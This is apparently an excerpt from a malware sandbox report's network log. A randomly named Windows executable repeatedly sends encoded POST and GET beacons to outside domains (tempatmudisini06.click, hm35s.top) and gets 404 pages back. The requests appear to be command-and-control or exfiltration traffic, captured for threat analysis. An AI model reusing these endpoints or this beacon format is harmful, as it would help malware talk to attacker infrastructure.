                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                            Nov 24, 2024 08:22:13.321419954 CET218INData Raw: 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e
                                                                            Data Ascii: <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.1049862103.21.221.4804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:19.310132980 CET712OUTPOST /4iun/ HTTP/1.1
                                                                            Host: www.tempatmudisini06.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.tempatmudisini06.click
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.tempatmudisini06.click/4iun/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 62 54 67 4c 56 73 43 36 5a 34 79 59 54 2b 52 6e 4f 6a 78 4a 50 70 33 77 4a 52 68 42 72 57 37 30 6a 6c 37 47 57 5a 48 6c 79 62 6e 49 45 31 66 68 2b 35 31 49 70 56 79 6a 38 4f 6a 79 44 49 47 56 53 42 79 32 31 79 55 2f 70 44 6e 77 6f 78 73 43 74 52 38 66 68 39 61 78 4b 63 4e 52 65 4a 72 36 6e 64 50 63 74 38 47 56 75 6c 48 54 54 37 64 6c 69 48 4e 6d 2b 30 44 76 62 4d 7a 50 35 46 7a 66 55 6e 65 46 75 2b 59 51 37 4f 51 54 7a 57 79 65 77 55 6f 2f 6c 2b 31 78 6d 30 36 47 62 4d 59 7a 6b 6c 7a 5a 7a 33 42 61 4e 7a 56 55 32 6a 76 4d 34 56 7a 63 6f 4c 58 6d 36 61 67 4e
                                                                            Data Ascii: GX6Lp2F=bTgLVsC6Z4yYT+RnOjxJPp3wJRhBrW70jl7GWZHlybnIE1fh+51IpVyj8OjyDIGVSBy21yU/pDnwoxsCtR8fh9axKcNReJr6ndPct8GVulHTT7dliHNm+0DvbMzP5FzfUneFu+YQ7OQTzWyewUo/l+1xm06GbMYzklzZz3BaNzVU2jvM4VzcoLXm6agN
                                                                            Nov 24, 2024 08:22:20.908935070 CET1033INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:22:20 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.1049870103.21.221.4804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:21.973274946 CET736OUTPOST /4iun/ HTTP/1.1
                                                                            Host: www.tempatmudisini06.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.tempatmudisini06.click
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.tempatmudisini06.click/4iun/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 62 54 67 4c 56 73 43 36 5a 34 79 59 51 65 42 6e 4d 45 64 4a 49 4a 33 78 58 68 68 42 69 32 37 77 6a 6b 48 47 57 59 43 34 79 4a 44 49 46 52 50 68 2f 34 31 49 6c 31 79 6a 33 75 6a 33 65 34 47 6b 53 42 2b 2b 31 33 30 2f 70 44 7a 77 6f 78 38 43 75 6d 49 59 67 74 61 4a 48 38 4e 58 51 70 72 36 6e 64 50 63 74 39 69 7a 75 6b 76 54 54 4c 4e 6c 69 6d 4e 6c 32 55 44 6f 4c 63 7a 50 76 31 7a 54 55 6e 66 53 75 37 42 59 37 4e 6f 54 7a 57 43 65 77 46 6f 34 71 2b 31 4e 6f 55 37 4c 63 2f 35 58 71 6e 4b 68 30 6d 59 55 4d 44 4a 73 31 43 53 4c 70 45 53 4c 37 38 4c 6f 30 63 56 6e 4c 54 61 34 6e 6e 37 52 6f 58 69 55 63 6f 6f 57 42 43 6e 30 38 67 3d 3d
                                                                            Data Ascii: GX6Lp2F=bTgLVsC6Z4yYQeBnMEdJIJ3xXhhBi27wjkHGWYC4yJDIFRPh/41Il1yj3uj3e4GkSB++130/pDzwox8CumIYgtaJH8NXQpr6ndPct9izukvTTLNlimNl2UDoLczPv1zTUnfSu7BY7NoTzWCewFo4q+1NoU7Lc/5XqnKh0mYUMDJs1CSLpESL78Lo0cVnLTa4nn7RoXiUcooWBCn08g==
                                                                            Nov 24, 2024 08:22:23.530997992 CET1033INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:22:23 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.1049878103.21.221.4804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:24.641484976 CET1749OUTPOST /4iun/ HTTP/1.1
                                                                            Host: www.tempatmudisini06.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.tempatmudisini06.click
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.tempatmudisini06.click/4iun/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 62 54 67 4c 56 73 43 36 5a 34 79 59 51 65 42 6e 4d 45 64 4a 49 4a 33 78 58 68 68 42 69 32 37 77 6a 6b 48 47 57 59 43 34 79 4a 4c 49 46 6a 48 68 39 62 4e 49 6d 31 79 6a 2b 4f 6a 32 65 34 47 44 53 42 57 36 31 33 35 49 70 41 4c 77 36 48 77 43 36 43 55 59 35 64 61 4a 62 4d 4e 53 65 4a 71 34 6e 5a 71 62 74 39 79 7a 75 6b 76 54 54 4e 68 6c 79 6e 4e 6c 30 55 44 76 62 4d 7a 62 35 46 7a 2f 55 6e 57 6e 75 37 4e 49 36 38 49 54 30 32 53 65 32 33 41 34 31 4f 31 4c 6c 30 36 59 63 2f 31 49 71 6e 58 59 30 6d 39 42 4d 42 5a 73 32 6c 32 52 79 55 61 78 68 61 72 49 79 71 78 5a 48 33 53 4b 71 48 36 42 75 48 4b 72 4a 35 34 46 4c 42 71 6d 73 76 70 45 51 58 35 72 71 39 72 42 7a 6e 4c 33 54 69 2f 6b 63 6e 54 71 38 31 4f 57 6b 46 4a 76 4f 4d 59 4b 4b 59 52 39 68 61 51 34 4b 71 6d 71 6b 6d 34 66 72 4c 38 41 5a 35 51 75 37 38 35 37 76 55 38 33 76 6a 45 6e 68 64 54 6f 62 52 7a 6c 56 2f 49 42 77 2b 6f 44 52 31 2b 6b 64 58 43 78 4b 63 6a 34 53 41 35 42 76 58 38 33 79 33 33 4c 4c 4b 7a 5a 75 47 68 77 59 4e [TRUNCATED]
                                                                            Data Ascii: GX6Lp2F=bTgLVsC6Z4yYQeBnMEdJIJ3xXhhBi27wjkHGWYC4yJLIFjHh9bNIm1yj+Oj2e4GDSBW6135IpALw6HwC6CUY5daJbMNSeJq4nZqbt9yzukvTTNhlynNl0UDvbMzb5Fz/UnWnu7NI68IT02Se23A41O1Ll06Yc/1IqnXY0m9BMBZs2l2RyUaxharIyqxZH3SKqH6BuHKrJ54FLBqmsvpEQX5rq9rBznL3Ti/kcnTq81OWkFJvOMYKKYR9haQ4Kqmqkm4frL8AZ5Qu7857vU83vjEnhdTobRzlV/IBw+oDR1+kdXCxKcj4SA5BvX83y33LLKzZuGhwYNJyhlWtTGWh1iuJOsqkL0FKt+Fhu+P0jH9O2wLS9ZyjecKDMcJSAUS3zDARgbvANShTUbK0kkQ/Ybc0vTX7eu6HiXZ7xNiUgDGCdgA2FI7PigK9UAh9lbrliaVBIRAImpTbc8YxG90k9IE/YUFK6HHgcv5kA/56pt1I5HvHMksEMOPc0r/jlkGfnS8Bq2sAlPxoPZ6EK7PivQb0Ro0KoYfVdfk0gvy1NC3wkIaBBpGf/cpb/ghv6aGgJME/g+klJ9tcWxUUIBGKtQZUQq7Kg9UZlgP+Rzmk06+7QTmZidPFeXwnb2afAR63xJJkrPL6G6it1f+cc5xTHFBcDLrbXKakolvY+0sQRxc9TXRY5jJFsUrgbn6qbj9uLZtHjFkigWkezDXNbHIMRq9o5bH0fhbg2ifxF24c1Nya8YtqwRqGJd0mGP2lAHd3rLoXOCvGw26YahPnHt5inWzVFIi7K/IwivD650ITdCJwlBJLyl6u4h9QN/RHmOJTNP4Cubu0l41Fruj+v/KyPgGNRjHripElJhpZeneL/kUA9kgxrNwBFq7/uhybIRweVU+5QnoIxqijqMfHrHoX5e35cYVhKjjH+AyK/Yw4cj7Y7v7jmp7yGVR71ZJG2An/OLJWgv53U+evq/8DMRtPxA/Pz3AcRWXP9hGRn3aBcvbF [TRUNCATED]
                                                                            Nov 24, 2024 08:22:26.222321987 CET1033INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:22:25 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.1049885103.21.221.4804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:27.292931080 CET432OUTGET /4iun/?GX6Lp2F=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywpudeeEuZLaZHAlqHDud2TkhyZZeYQxg==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.tempatmudisini06.click
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:22:28.903328896 CET1033INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 796
                                                                            date: Sun, 24 Nov 2024 07:22:28 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.1049901154.23.184.95804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:34.781830072 CET673OUTPOST /lazq/ HTTP/1.1
                                                                            Host: www.hm35s.top
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.hm35s.top
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.hm35s.top/lazq/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 62 76 38 76 56 2f 67 56 41 6c 7a 78 6d 70 4f 6e 33 43 42 70 6b 37 34 5a 46 6f 63 34 65 67 51 59 49 67 53 63 4b 68 47 4b 48 72 47 33 69 55 48 4b 62 39 36 57 68 6b 39 75 45 61 59 52 4c 68 78 2f 46 46 70 4c 37 38 66 66 64 41 43 77 72 2b 5a 78 79 62 38 62 62 6a 4c 4d 51 30 58 39 31 49 69 5a 49 6a 68 61 49 62 4d 69 4e 6d 55 43 2b 64 30 52 59 49 72 2f 4c 78 66 53 54 74 5a 37 79 70 72 54 6e 48 67 61 4e 50 6c 49 32 33 65 52 46 58 4f 46 71 4a 6c 58 61 43 70 41 79 4d 4c 73 64 44 71 42 48 68 61 51 41 75 30 51 76 71 68 34 50 64 46 42 2b 49 54 48 77 68 57 38 2f 67 58 74
                                                                            Data Ascii: GX6Lp2F=bv8vV/gVAlzxmpOn3CBpk74ZFoc4egQYIgScKhGKHrG3iUHKb96Whk9uEaYRLhx/FFpL78ffdACwr+Zxyb8bbjLMQ0X91IiZIjhaIbMiNmUC+d0RYIr/LxfSTtZ7yprTnHgaNPlI23eRFXOFqJlXaCpAyMLsdDqBHhaQAu0Qvqh4PdFB+ITHwhW8/gXt
                                                                            Nov 24, 2024 08:22:36.342447996 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Sun, 24 Nov 2024 07:22:36 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66a5f968-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.1049909154.23.184.95804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:37.439878941 CET697OUTPOST /lazq/ HTTP/1.1
                                                                            Host: www.hm35s.top
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.hm35s.top
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.hm35s.top/lazq/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 62 76 38 76 56 2f 67 56 41 6c 7a 78 6e 4a 65 6e 34 42 5a 70 7a 72 34 61 41 6f 63 34 48 51 52 52 49 67 65 63 4b 67 79 6b 48 5a 53 33 6a 31 33 4b 61 34 4f 57 67 6b 39 75 4c 4b 59 51 50 68 78 43 46 46 56 44 37 2b 4c 66 64 41 6d 77 72 2f 70 78 79 71 38 59 61 7a 4c 4f 62 55 58 37 34 6f 69 5a 49 6a 68 61 49 62 70 46 4e 6d 4d 43 2f 74 6b 52 4a 63 48 34 49 78 66 56 55 74 5a 37 32 70 72 70 6e 48 67 43 4e 4f 35 75 32 31 6d 52 46 53 71 46 71 59 6c 57 44 53 70 38 76 63 4b 73 64 7a 72 53 48 51 43 4a 46 66 73 6c 78 70 4a 45 46 63 34 47 76 5a 79 51 6a 57 4b 79 78 6d 69 48 32 34 75 55 31 6e 43 68 6b 68 75 4c 37 6c 78 49 46 41 47 62 57 77 3d 3d
                                                                            Data Ascii: GX6Lp2F=bv8vV/gVAlzxnJen4BZpzr4aAoc4HQRRIgecKgykHZS3j13Ka4OWgk9uLKYQPhxCFFVD7+LfdAmwr/pxyq8YazLObUX74oiZIjhaIbpFNmMC/tkRJcH4IxfVUtZ72prpnHgCNO5u21mRFSqFqYlWDSp8vcKsdzrSHQCJFfslxpJEFc4GvZyQjWKyxmiH24uU1nChkhuL7lxIFAGbWw==
                                                                            Nov 24, 2024 08:22:39.021914959 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Sun, 24 Nov 2024 07:22:38 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66a5f968-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
